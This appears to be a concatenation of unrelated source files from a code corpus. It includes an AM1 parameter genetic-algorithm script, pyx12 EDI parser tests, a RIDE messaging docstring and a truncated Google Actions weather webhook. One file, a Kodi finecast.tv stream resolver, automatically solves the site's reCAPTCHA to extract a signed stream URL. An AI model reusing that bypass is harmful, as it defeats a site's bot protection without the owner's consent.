MUTPT = reparm_data.reparm_input.mutation_perturbation
# Initial Perturbation
IMUTPT = 0.05
# Initial List of parameters
IL = []
for i in range(0, len(reparm_data.best_am1_individual.inputs[0].parameters[0].p_floats), 4):
IL.append(reparm_data.best_am1_individual.inputs[0].parameters[0].p_floats[i])
# The evaluator (fitness, cost) function
eval = Evaluator(reparm_data=reparm_data)
if reparm_data.best_fitness is None:
reparm_data.best_fitness = list(eval.eval(IL))
reparm_data.original_fitness = deepcopy(reparm_data.best_fitness)
else:
reparm_data.best_fitness = list(eval.eval(IL))
print("original_fitness", reparm_data.original_fitness)
print("starting at", reparm_data.best_fitness)
#############################################
# END USER INPUT
#############################################
#############################################
# BEGIN DEAP SETUP
#############################################
creator.create("FitnessMax", base.Fitness, weights=(-1.0, 0, 0))
creator.create("ParamSet", list, fitness=creator.FitnessMax, best=None)
toolbox = base.Toolbox()
toolbox.register("individual", generator, IL, IMUTPT)
toolbox.register("population", tools.initRepeat, list, toolbox.individual)
toolbox.register("mate", tools.cxSimulatedBinary)
toolbox.register("mutate", mutateset, pert=MUTPT, chance=MUTR)
toolbox.register("select", tools.selTournament, tournsize=3)
toolbox.register("evaluate", eval.eval)
pop = toolbox.population(n=PSIZE)
#############################################
# END DEAP SETUP
#############################################
#############################################
# BEGIN GENETIC ALGORITHM
#############################################
for g in range(NGEN):
print("Starting gen:", g)
offspring = toolbox.select(pop, len(pop))
offspring = list(map(toolbox.clone, offspring))
for child1, child2 in zip(offspring[::2], offspring[1::2]):
if random.random() < CXPB:
toolbox.mate(child1, child2, CWD)
del child1.fitness.values
del child2.fitness.values
for mutant in offspring:
if random.random() < MUTPB:
toolbox.mutate(mutant)
del mutant.fitness.values
invalid_ind = [ind for ind in offspring if not ind.fitness.valid]
fitnesses = []
for i in invalid_ind:
try:
fitness = toolbox.evaluate(i)
fitnesses.append(fitness)
reparm_data.observations.append(list(i))
i.fitness.values = fitness
if not reparm_data.best_fitness or fitness[0] < reparm_data.best_fitness[0]:
print("Previous Best", reparm_data.best_fitness)
reparm_data.best_fitness = list(fitness)
reparm_data.best_am1_individual.set_pfloats(i)
print("NewBest Found:", reparm_data.best_fitness)
except TypeError:
fitnesses.append(None)
reparm_data.save()
pop[:] = offspring
#############################################
# End Genetic Algorithm
#############################################
#############################################
# Begin Particle Simulation
#############################################
# for g in range(NGEN):
# for part in pop:
# part.fitness.values = toolbox.evaluate(part)
# if not part.best or part.best.fitness < part.fitness:
# part.best = creator.ParamSet(part)
# part.best.fitness.values = part.fitness.values
# if not best or best.fitness < part.fitness:
# best = creator.ParamSet(part)
# best.fitness.values = part.fitness.values
# for part in pop:
# toolbox.mutate(part)
# print(best, "with fitness", best.fitness)
#############################################
# End Particle Simulation
#############################################
#############################################
# Begin Print Out
#############################################
gin_best = reparm_data.best_am1_individual.inputs[0]
s_opt_header = "#P AM1(Input,Print) opt\n\nAM1\n"
opt_header = Header(s_opt_header)
gin_opt = GaussianInput(header=opt_header,
coordinates=gin_best.coordinates[0],
parameters=gin_best.parameters[0])
fout = open("reparm_best_opt.com", 'w')
fout.write(gin_opt.str())
fout.close()
try:
gout = gaussian_single(gin_opt.str())
fout = open("reparm_best_opt.log", 'w')
fout.write(gout)
fout.close()
except TypeError:
print("Could not get output file from input,"
"most likely, optimization failed to converge")
#############################################
# End Print Out
#############################################
#############################################
# Begin ScikitLearn
#############################################
# # Preprocessor
# targets = np.array(reparm_data.targets)
# X = np.array(reparm_data.observations)
# y = targets[:, 0] # 0, 1, 2 for total, energy, and dipole
# X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1)
# stdsc = StandardScaler()
# X_train_std = stdsc.fit_transform(X_train)
# X_test_std = stdsc.transform(X_test)
#
# # Training
# clf = svm.SVR(C=1.3, kernel='rbf')
# # clf = RandomForestRegressor(n_estimators=20)
# clf.fit(X_train, y_train)
# print("Using {} samples with fitness score {}".format(len(y), clf.score(X_test, y_test)))
#
# initial_guess = np.array(IL)
# fun = lambda x: clf.predict(stdsc.transform(x.reshape(1, -1)))
# print("Predicting best parameters")
# min_params = (minimize(fun, initial_guess)).x
# stdsc.inverse_transform(min_params)
# params = min_params.tolist()
# skl_best = deepcopy(reparm_data.best_am1_individual)
# skl_best.set_pfloats(params)
# open("skl_best.com", 'w').write(skl_best.inputs[0].str())
# skl_fitness = eval.eval(params)
# if skl_fitness:
# print("skl_fitness:", skl_fitness)
#############################################
# End ScikitLearn
#############################################
#############################################
# Begin Analysis
#############################################
anal = Analysis(reparm_data)
anal.trithiophene()
#############################################
# End Analysis
#############################################
| 1.976563 | 2 |
pyx12/test/test_x12context.py | arenius/pyx12 | 1 | 6880 | import unittest
#import tempfile
try:
from StringIO import StringIO
except:
from io import StringIO
import pyx12.error_handler
from pyx12.errors import EngineError # , X12PathError
import pyx12.x12context
import pyx12.params
from pyx12.test.x12testdata import datafiles
class X12fileTestCase(unittest.TestCase):
def setUp(self):
self.param = pyx12.params.params()
def _makeFd(self, x12str=None):
try:
if x12str:
fd = StringIO(x12str)
else:
fd = StringIO()
except:
if x12str:
fd = StringIO(x12str, encoding='ascii')
else:
fd = StringIO(encoding='ascii')
fd.seek(0)
return fd
class Delimiters(X12fileTestCase):
def test_arbitrary_delimiters(self):
str1 = 'ISA&00& &00& &ZZ&ZZ000 &ZZ&ZZ001 &030828&1128&U&00401&000010121&0&T&!+\n'
str1 += 'GS&HC&ZZ000&ZZ001&20030828&1128&17&X&004010X098A1+\n'
str1 += 'ST&837&11280001+\n'
str1 += 'REF&87&004010X098A1+\n'
str1 += 'SE&3&11280001+\n'
str1 += 'GE&1&17+\n'
str1 += 'IEA&1&000010121+\n'
fd = self._makeFd(str1)
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments():
pass
self.assertEqual(src.subele_term, '!')
self.assertEqual(src.ele_term, '&')
self.assertEqual(src.seg_term, '+')
def test_binary_delimiters(self):
str1 = 'ISA&00& &00& &ZZ&ZZ000 &ZZ&ZZ001 &030828&1128&U&00401&000010121&0&T&!+\n'
str1 += 'GS&HC&ZZ000&ZZ001&20030828&1128&17&X&004010X098A1+\n'
str1 += 'ST&837&11280001+\n'
str1 += 'REF&87&004010X098A1+\n'
str1 += 'SE&3&11280001+\n'
str1 += 'GE&1&17+\n'
str1 += 'IEA&1&000010121+\n'
str1 = str1.replace('&', chr(0x1C))
str1 = str1.replace('+', chr(0x1D))
str1 = str1.replace('!', chr(0x1E))
fd = self._makeFd(str1)
errors = []
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments():
pass
self.assertEqual(src.subele_term, chr(0x1E))
self.assertEqual(src.ele_term, chr(0x1C))
self.assertEqual(src.seg_term, chr(0x1D))
class TreeGetValue(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_get_line_numbers_2200(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(self.loop2300.seg_count, 19)
self.assertEqual(self.loop2300.cur_line_number, 21)
for seg in loop2400.select('CLM'):
self.assertEqual(seg.seg_count, 25)
self.assertEqual(seg.cur_line_number, 2271)
break
def test_get_line_numbers_2400(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.seg_count, 35)
self.assertEqual(loop2400.cur_line_number, 37)
for svc in loop2400.select('SV1'):
self.assertEqual(svc.seg_count, 36)
self.assertEqual(svc.cur_line_number, 38)
break
def test_get_seg_value(self):
self.assertEqual(self.loop2300.get_value('CLM02'), '21')
self.assertEqual(self.loop2300.get_value('CLM99'), None)
def test_get_seg_value_fail_no_element_index(self):
self.assertRaises(IndexError, self.loop2300.get_value, 'CLM')
def test_get_parent_value(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.get_value('../CLM01'), '3215338')
self.assertEqual(loop2400.get_value('../2310B/NM109'), '222185735')
def test_get_seg_value_idx(self):
for clm in self.loop2300.select('CLM'):
self.assertEqual(clm.get_value('02'), '21')
self.assertEqual(clm.get_value('05-3'), '1')
def test_get_first_value(self):
self.assertEqual(self.loop2300.get_value('2400/SV101'), 'HC:H2015:TT')
self.assertEqual(self.loop2300.get_value('2400/SV101-2'), 'H2015')
self.assertEqual(self.loop2300.get_value('2400/REF[6R]02'), '1057296')
self.assertEqual(self.loop2300.get_value('2400/2430/SVD02'), '21')
self.assertEqual(self.loop2300.get_value('2400/AMT[AAE]02'), '21')
def test_get_first_value_2400(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.get_value('AMT[AAE]02'), '21')
self.assertEqual(loop2400.get_value('2430/AMT[AAE]02'), None)
def test_get_no_value(self):
self.assertEqual(self.loop2300.get_value('2400/SV199'), None)
self.assertEqual(self.loop2300.get_value('2400'), None)
def test_get_parent_no_value(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.get_value('../2310E/NM109'), None)
def test_get_specific_qual(self):
self.assertEqual(self.loop2300.get_value('2400/REF[6R]02'), '1057296')
self.assertEqual(self.loop2300.get_value('2400/REF[G1]02'), None)
self.assertEqual(self.loop2300.get_value('2400/REF[XX]02'), None)
class TreeSetValue(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_set_seg_value(self):
self.loop2300.set_value('CLM02', '50')
self.assertEqual(self.loop2300.get_value('CLM02'), '50')
def test_set_first_value_2400(self):
loop2400 = self.loop2300.first('2400')
loop2400.set_value('AMT[AAE]02', '25')
self.assertEqual(loop2400.get_value('AMT[AAE]02'), '25')
class TreeSelect(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
self.param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
#def test_select_loop_and_parent(self):
# loop2400 = self.loop2300.first('2400')
# assert loop2400.id == '2400', 'Not in 2400'
# ct = 0
# newtree = loop2400.parent
# for newtree in loop2400.select('../'):
# self.assertEqual(newtree.id, '2300')
# ct += 1
# self.assertEqual(ct, 1)
def test_select_loops(self):
ct = 0
for newtree in self.loop2300.select('2400'):
self.assertEqual(newtree.id, '2400')
ct += 1
self.assertEqual(ct, 2)
def test_select_seg(self):
ct = 0
for newtree in self.loop2300.select('2400/SV1'):
self.assertEqual(newtree.id, 'SV1')
self.assertEqual(newtree.get_value('SV102'), '21')
ct += 1
self.assertEqual(ct, 2)
def test_select_parent_seg(self):
loop2400 = self.loop2300.first('2400')
assert loop2400.id == '2400', 'Not in 2400'
ct = 0
for newtree in loop2400.select('../CLM'):
self.assertEqual(newtree.id, 'CLM')
self.assertEqual(newtree.get_value('CLM01'), '3215338')
ct += 1
self.assertEqual(ct, 1)
def test_select_from_st(self):
fd = self._makeFd(datafiles['835id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
ct = 0
for datatree in src.iter_segments('ST_LOOP'):
if datatree.id == 'ST_LOOP':
for claim in datatree.select('DETAIL/2000/2100'):
self.assertEqual(claim.id, '2100')
ct += 1
self.assertEqual(
ct, 3, 'Found %i 2100 loops. Should have %i' % (ct, 3))
def test_select_from_gs(self):
fd = self._makeFd(datafiles['simple_837i']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
ct = 0
for datatree in src.iter_segments('GS_LOOP'):
if datatree.id == 'GS_LOOP':
for sub in datatree.select('ST_LOOP/DETAIL/2000A/2000B/2300/2400'):
self.assertEqual(sub.id, '2400')
ct += 1
self.assertEqual(
ct, 6, 'Found %i 2400 loops. Should have %i' % (ct, 6))
class TreeSelectFromSegment(X12fileTestCase):
def test_select_from_seg_fail(self):
fd = self._makeFd(datafiles['835id']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in src.iter_segments('ST_LOOP'):
if datatree.id == 'GS':
#self.assertFalseRaises(AttributeError, datatree.select, 'DETAIL/2000/2100')
for claim in datatree.select('DETAIL/2000/2100'):
pass
class TreeAddSegment(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_add_new_plain(self):
seg_data = pyx12.segment.Segment('HCP*00*7.11~', '~', '*', ':')
new_node = self.loop2300.add_segment(seg_data)
self.assertNotEqual(new_node, None)
def test_add_new_id(self):
seg_data = pyx12.segment.Segment('REF*F5*6.11~', '~', '*', ':')
new_node = self.loop2300.add_segment(seg_data)
self.assertNotEqual(new_node, None)
def test_add_new_not_exists(self):
seg_data = pyx12.segment.Segment('ZZZ*00~', '~', '*', ':')
self.assertRaises(pyx12.errors.X12PathError,
self.loop2300.add_segment, seg_data)
class TreeAddSegmentString(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_add_new_plain(self):
new_node = self.loop2300.add_segment('HCP*00*7.11~')
self.assertNotEqual(new_node, None)
def test_add_new_id(self):
new_node = self.loop2300.add_segment('REF*F5*6.11')
self.assertNotEqual(new_node, None)
def test_add_new_not_exists(self):
self.assertRaises(pyx12.errors.X12PathError,
self.loop2300.add_segment, 'ZZZ*00~')
class SegmentExists(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
self.param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_qual_segment(self):
self.assertTrue(self.loop2300.exists('2310B'))
self.assertTrue(self.loop2300.exists('2310B/NM1[82]'))
for loop2310b in self.loop2300.select('2310B'):
self.assertTrue(loop2310b.exists('NM1'))
self.assertTrue(loop2310b.exists('NM1[82]'))
def test_qual_segment_sub_loop(self):
self.assertTrue(self.loop2300.exists('2400/2430'))
self.assertTrue(self.loop2300.exists('2400/2430/DTP[573]'))
self.assertFalse(self.loop2300.exists('2400/2430/DTP[111]'))
self.assertTrue(self.loop2300.exists('2400/2430/DTP[573]03'))
def test_qual_segment_select_sub_loop(self):
loop2430 = self.loop2300.first('2400/2430')
self.assertTrue(loop2430.exists('DTP'))
self.assertTrue(loop2430.exists('DTP[573]'))
self.assertTrue(loop2430.exists('DTP[573]03'))
def test_qual_834_dtp(self):
fd = self._makeFd(datafiles['834_lui_id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
self.assertTrue(loop2300.exists('DTP[348]'))
self.assertFalse(loop2300.exists('DTP[349]'))
class TreeAddLoop(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_add_new_plain(self):
seg_data = pyx12.segment.Segment(
'NM1*82*2*Provider 1*****ZZ*9898798~', '~', '*', ':')
new_node = self.loop2300.add_loop(seg_data)
self.assertNotEqual(new_node, None)
self.assertTrue(self.loop2300.exists('2310B'))
for loop2310b in self.loop2300.select('2310B'):
self.assertTrue(loop2310b.exists('NM1'))
self.assertTrue(loop2310b.exists('NM1[82]'))
def test_add_new_string_seg(self):
old_ct = self.loop2300.count('2400')
new_node = self.loop2300.add_loop('LX*5~')
self.assertNotEqual(new_node, None)
self.assertTrue(self.loop2300.exists('2400'))
self.assertEqual(old_ct + 1, self.loop2300.count('2400'))
for loop2400 in self.loop2300.select('2400'):
self.assertTrue(loop2400.exists('LX'))
class TreeAddLoopDetail(X12fileTestCase):
def test_add_loops_under_detail(self):
str1 = 'ISA&00& &00& &ZZ&ZZ000 &ZZ&ZZ001 &030828&1128&U&00401&000010121&0&T&!+\n'
str1 += 'GS&BE&ZZ000&ZZ001&20030828&1128&17&X&004010X095A1+\n'
str1 += 'ST&834&11280001+\n'
str1 += 'BGN&+\n'
str1 += 'INS&Y&18&30&XN&AE&RT+\n'
str1 += 'SE&4&11280001+\n'
str1 += 'GE&1&17+\n'
str1 += 'IEA&1&000010121+\n'
fd = self._makeFd(str1)
errors = []
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(param, errh, fd)
for st_loop in src.iter_segments('ST_LOOP'):
if st_loop.id == 'ST_LOOP' and st_loop.exists('DETAIL'):
detail = st_loop.first('DETAIL')
self.assertTrue(detail.exists('2000'))
detail.first('2000').delete()
self.assertFalse(detail.exists('2000'))
detail.add_loop('INS&Y&18&30&XN&AE&RT+')
self.assertTrue(detail.exists('2000'))
class TreeAddNode(X12fileTestCase):
def setUp(self):
self.param = pyx12.params.params()
def test_add_loop(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
self.assertEqual(self._get_count(loop2300, '2400'), 2)
for node in loop2300.select('2400'):
loop2300.add_node(node)
self.assertEqual(self._get_count(loop2300, '2400'), 4)
def test_add_segment(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
self.assertEqual(self._get_count(loop2300, 'CN1'), 1)
for node in loop2300.select('CN1'):
loop2300.add_node(node)
self.assertEqual(self._get_count(loop2300, 'CN1'), 2)
def test_fail(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
for node in loop2300.select('CN1'):
cn1 = node
break
n2400 = None
for node in loop2300.select('2400'):
n2400 = node
break
assert n2400 is not None, 'Loop 2400 was not matched'
self.assertRaises(pyx12.errors.X12PathError, n2400.add_node, cn1)
def _get_count(self, node, loop_id):
ct = 0
for n in node.select(loop_id):
ct += 1
return ct
class CountRepeatingLoop(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300' and datatree.get_value('CLM01') == '5555':
self.loop2300 = datatree
break
def test_repeat_2400(self):
ct = 0
for loop_2400 in self.loop2300.select('2400'):
ct += 1
self.assertEqual(
ct, 3, 'Found %i 2400 loops. Should have %i' % (ct, 3))
def test_repeat_2430(self):
ct = 0
for loop_2430 in self.loop2300.select('2400/2430'):
ct += 1
self.assertEqual(
ct, 0, 'Found %i 2430 loops. Should have %i' % (ct, 0))
class IterateTree(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
def test_iterate_all(self):
ct_2000a = 0
ct_other = 0
for datatree in self.src.iter_segments('2000A'):
if datatree.id == '2000A':
ct_2000a += 1
else:
ct_other += 1
self.assertEqual(ct_2000a, 1,
'Found %i 2000A loops. Should have %i' % (ct_2000a, 1))
self.assertEqual(ct_other, 11, 'Found %i external segments. Should have %i' % (ct_other, 11))
class TreeDeleteSegment(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_delete(self):
assert self.loop2300.get_value('CN101') == '05'
seg_data = pyx12.segment.Segment('CN1*05~', '~', '*', ':')
self.assertTrue(self.loop2300.delete_segment(seg_data))
self.assertEqual(self.loop2300.get_value('CN101'), None)
def test_delete_fail(self):
seg_data = pyx12.segment.Segment('HCP*00*7.11~', '~', '*', ':')
self.assertFalse(self.loop2300.delete_segment(seg_data))
class TreeDeleteLoop(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_delete(self):
self.assertEqual(self.loop2300.get_value('2400/LX01'), '1')
self.assertTrue(self.loop2300.delete_node('2400'))
self.assertEqual(self.loop2300.get_value('2400/LX01'), '2')
def test_delete_fail(self):
self.assertFalse(self.loop2300.delete_node('2500'))
class NodeDeleteSelf(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_delete(self):
cn1 = self.loop2300.first('CN1')
assert cn1.id == 'CN1'
cn1.delete()
try:
a = cn1.id
except EngineError:
pass
except:
a = cn1.id
#self.assertRaises(EngineError, cn1.id)
class TreeCopy(X12fileTestCase):
def setUp(self):
self.param = pyx12.params.params()
def test_add_node(self):
fd = self._makeFd(datafiles['835id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2100'):
if datatree.id == '2100':
for svc in datatree.select('2110'):
new_svc = svc.copy()
new_svc.set_value('SVC01', 'XX:AAAAA')
self.assertTrue(not svc is new_svc)
datatree.add_node(new_svc)
#for svc in datatree.select('2110'):
# print svc.get_value('SVC01')
break
def test_copy_seg(self):
fd = self._makeFd(datafiles['835id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2100'):
if datatree.id == '2100':
for svc in datatree.select('2110'):
new_svc = svc.copy()
self.assertFalse(svc is new_svc)
self.assertEqual(svc.get_value('SVC01'),
new_svc.get_value('SVC01'))
new_svc.set_value('SVC01', 'XX:AAAAA')
self.assertFalse(svc is new_svc)
self.assertNotEqual(svc.get_value('SVC01'),
new_svc.get_value('SVC01'))
break
| 2.421875 | 2 |
repo/script.module.liveresolver/lib/liveresolver/resolvers/finecast.py | Hades01/Addons | 3 | 6881 | <reponame>Hades01/Addons<filename>repo/script.module.liveresolver/lib/liveresolver/resolvers/finecast.py<gh_stars>1-10
# -*- coding: utf-8 -*-
import re,urlparse,cookielib,os,urllib
from liveresolver.modules import client,recaptcha_v2,control,constants, decryptionUtils
from liveresolver.modules.log_utils import log
cookieFile = os.path.join(control.dataPath, 'finecastcookie.lwp')
def resolve(url):
#try:
try:
referer = urlparse.parse_qs(urlparse.urlparse(url).query)['referer'][0]
except:
referer=url
id = urlparse.parse_qs(urlparse.urlparse(url).query)['u'][0]
cj = get_cj()
url = 'http://www.finecast.tv/embed4.php?u=%s&vw=640&vh=450'%id
rs = client.request(url,referer=referer,cj=cj)
sitekey = re.findall('data-sitekey="([^"]+)', rs)[0]
token = recaptcha_v2.UnCaptchaReCaptcha().processCaptcha(sitekey, lang='de')
#1:04
result =client.request (url, post=urllib.urlencode(token),referer=referer)
log(result)
file = re.findall('[\'\"](.+?.stream)[\'\"]',result)[0]
auth = re.findall('[\'\"](\?wmsAuthSign.+?)[\'\"]',result)[0]
rtmp = 'http://play.finecast.tv:1935/live/%s/playlist.m3u8%s'%(file,auth)
return rtmp
#except:
# return
def get_cj():
cookieJar=None
try:
cookieJar = cookielib.LWPCookieJar()
cookieJar.load(cookieFile,ignore_discard=True)
except:
cookieJar=None
if not cookieJar:
cookieJar = cookielib.LWPCookieJar()
return cookieJar | 1.984375 | 2 |
src/robotide/publish/__init__.py | crylearner/RIDE3X | 1 | 6882 | <filename>src/robotide/publish/__init__.py<gh_stars>1-10
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org:licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Message publishing and subscribing.
.. contents::
:depth: 2
:local:
Introduction
------------
RIDE uses messages for communication when something of interest happens, for
example a suite is loaded or item is selected in the tree. This module provides
means both for subscribing to listen to those messages and for sending them.
Messages are used for communication between the different components of the
core application, but their main usage is notifying plugins about various events.
Plugins can also send messages themselves, and also create custom messages, if
they have a need.
Subscribing
-----------
The core application uses the global `PUBLISHER` object (an instance of the
`Publisher` class) for subscribing to and unsubscribing from the messages.
Plugins should use the helper methods of the `Plugin` class instead of using
the `PUBLISHER` directly.
Message topics
~~~~~~~~~~~~~~
Regardless the method, subscribing to messages requires a message topic.
Topics can be specified using the actual message classes in
`robotide.publish.messages` module or with their dot separated topic strings.
It is, for example, equivalent to use the `RideTreeSelection` class and a
string ``ride.tree.selection``. Topic strings can normally, but not always, be
mapped directly to the class names.
The topic strings represents a hierarchy where the dots separate the hierarchy
levels. All messages with a topic at or below the given level will match the
subscribed topic. For example, subscribing to the ``ride.notebook`` topic means
that `RideNotebookTabChanged` or any other message with a topic starting with
``ride.notebook`` will match.
Listeners
~~~~~~~~~
Another thing needed when subscribing is a listener, which must be a callable
accepting one argument. When the corresponding message is published, the listener
will be called with an instance of the message class as an argument. That instance
contains the topic and possibly some additional information in its attributes.
The following example demonstrates how a plugin can subscribe to an event.
In this example the ``OnTreeSelection`` method is the listener and the
``message`` it receives is an instance of the `RideTreeSelection` class.
::
from robotide.pluginapi import Plugin, RideTreeSelection
class MyFancyPlugin(Plugin):
def activate(self):
self.subscribe(self.OnTreeSelection, RideTreeSelection)
def OnTreeSelection(self, message):
print message.topic, message.node
Unsubscribing
~~~~~~~~~~~~~
Unsubscribing from a single message requires passing the same topic and listener
to the unsubscribe method that were used for subscribing. Additionally both
the `PUBLISHER` object and the `Plugin` class provide a method for unsubscribing
all listeners registered by someone.
Publishing messages
-------------------
Both the core application and plugins can publish messages using message
classes in the `publish.messages` module directly. Sending a message is as easy
as creating an instance of the class and calling its ``publish`` method. What
parameters are need when the instance is created depends on the message.
Custom messages
~~~~~~~~~~~~~~~
Most of the messages in the `publish.messages` module are to be sent only by
the core application. If plugins need their own messages, for example for
communication between different plugins, they can easily create custom messages
by extending the `RideMessage` base class::
from robotide.pluginapi import Plugin, RideMessage
class FancyImportantMessage(RideMessage):
data = ['importance']
class MyFancyPlugin(Plugin):
def important_action(self):
# some code ...
MyImportantMessage(importance='HIGH').publish()
Plugins interested about this message can subscribe to it using either
the class ``FancyImportantMessage`` or its automatically generated title
``fancy.important``. Notice also that all the messages are exposed also through
the `robotide.pluginapi` module and plugins should import them there.
"""
import os
from robotide.context import WX_VERSION
if WX_VERSION > '3.0':
from wx.lib.pubsub import setuparg1
elif WX_VERSION > '2.9':
from wx.lib.pubsub import setupv1
from .messages import *
from .publisher import PUBLISHER
def get_html_message(name):
return open(os.path.join(
os.path.dirname(__file__), 'html', '{}.html'.format(name))).read()
| 1.984375 | 2 |
app.py | pizzapanther/google-actions-python-example | 9 | 6883 | #!/usr/bin/env python
import os
import json
import tornado.ioloop
import tornado.log
import tornado.web
from google.oauth2 import id_token
from google.auth.transport import requests as google_requests
import jwt
import requests
API_KEY = os.environ.get('OPEN_WEATHER_MAP_KEY', None)
PROJECT_ID = os.environ.get('PROJECT_ID', None)
class WeatherHandler(tornado.web.RequestHandler):
def start_conversation (self):
response = {
'expectUserResponse': True,
'expectedInputs': [
{
'possibleIntents': {'intent': 'actions.intent.TEXT'},
'inputPrompt': {
'richInitialPrompt': {
'items': [
{
'simpleResponse': {
'ssml': '<speak>What city would you like the weather for?</speak>'
}
}
]
}
}
}
]
}
self.set_header("Content-Type", 'application/json')
self.set_header('Google-Assistant-API-Version', 'v2')
self.write(json.dumps(response, indent=2))
def get_weather (self, city):
api_response = requests.get(
'http://api.openweathermap.org/data/2.5/weather',
params={'q': city, 'APPID': API_KEY}
)
data = api_response.json()
if 'main' not in data:
response = {
'expectUserResponse': False,
'finalResponse': {
'richResponse': {
'items': [
{
'simpleResponse': {
'ssml': '<speak>City not found - meow!</speak>'
}
}
]
}
}
}
else:
temp = round(1.8 * (data['main']['temp'] - 273) + 32)
response = {
'expectUserResponse': False,
'finalResponse': {
'richResponse': {
